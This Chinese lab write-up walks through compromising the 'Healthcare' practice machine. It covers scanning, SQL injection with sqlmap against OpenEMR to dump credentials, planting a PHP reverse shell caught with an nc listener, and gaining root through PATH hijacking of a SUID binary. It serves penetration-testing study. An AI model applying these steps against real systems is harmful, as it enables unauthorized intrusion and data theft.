Healthcare靶机wp

主机探活

nmap -sP 192.168.159.0/24

在这里插入图片描述

192.168.159.160


端口发现

nmap -sV -p- -A 192.168.159.160

在这里插入图片描述

只开放了 21、80端口


80端口

nikto
nikto -h 192.168.159.160

在这里插入图片描述

没有什么可以利用的。。。


目录扫描
dirsearch -u 192.168.159.160

在这里插入图片描述


根据扫描结果,感觉只有 robots.txt 有用,访问

在这里插入图片描述

获得了多个目录,但是访问后并没有获得任何可用信息。。。

想要进行子域名扫描,可是在信息收集时没有找到域名,所以应该不用域名


21端口 ftp

先本地漏洞库看是否存在漏洞

searchsploit proftpd 1.3.3d

在这里插入图片描述

无结果。。。


尝试匿名访问

ftp 192.168.159.160		# anonymous

在这里插入图片描述

失败。。。


再次80端口

上网查看了其他大佬写得过程,发现是 dirsearch 的默认目录不大好使,有的目录没扫出来。。。跑一个大字典试试

dirsearch -u 192.168.159.160 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt	# -w 指定字典

CMS

发现一个目录:/openerm,访问

在这里插入图片描述

发现是一个 CMS :OpenEMR 4.1.0


在本地漏洞库搜索相应漏洞

在这里插入图片描述

找到两个漏洞,都是sql注入,查看相应信息


searchsploit -m 49742.py		# 把文件复制到当前文件夹
cat 49742.py					# 查看

在这里插入图片描述

发现了存在sql注入漏洞的路径,本机访问尝试一下

在这里插入图片描述

确实存在 sql注入 漏洞


sql注入

sqlmap 一把梭

http://192.168.159.160/openemr/interface/login/validateUser.php?u= --dump

在这里插入图片描述

获得两组用户名密码:admin/ackbar medical/medical


反弹shell

成功利用 admin 用户登录网站成功

在这里插入图片描述


在菜单中的 adminstrator 下 发现了一个 files
在这里插入图片描述


发现可查看修改几个文件,如下图
在这里插入图片描述


选择一个 php 文件 进行修改,修改为 php 的反弹shell脚本

在这里插入图片描述


保存后本机启动 nc 监听

nc -nlvp 7777

访问 php 文件地址

http://192.168.159.160/openemr/sites/default/statement.inc.php

在这里插入图片描述


成功获取shell

在这里插入图片描述


提权

setuid
find / -perm -u=s -type f 2>/dev/null

发现一个可疑程序

在这里插入图片描述


查看一下

cat /usr/bin/healthcheck

在这里插入图片描述


是一个可执行文件,用 `strings` 查看一下

在这里插入图片描述

我们发现它调用了一些命令,比如 echo、sleep、ifconfig、fdisk、du


环境变量劫持

首先去到 /tmp 目录下建一个新的 sleep 命令

在这里插入图片描述

写入需要的内容

在这里插入图片描述

给它执行权限

在这里插入图片描述


先查看当前环境变量

echo $PATH

修改环境变量(让系统在查询命令时先去/tmp目录下查询)

export PATH=/tmp:$PATH

在这里插入图片描述

运行 /usr/bin/healthcheck

在这里插入图片描述

成功获取 root 权限!!!

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值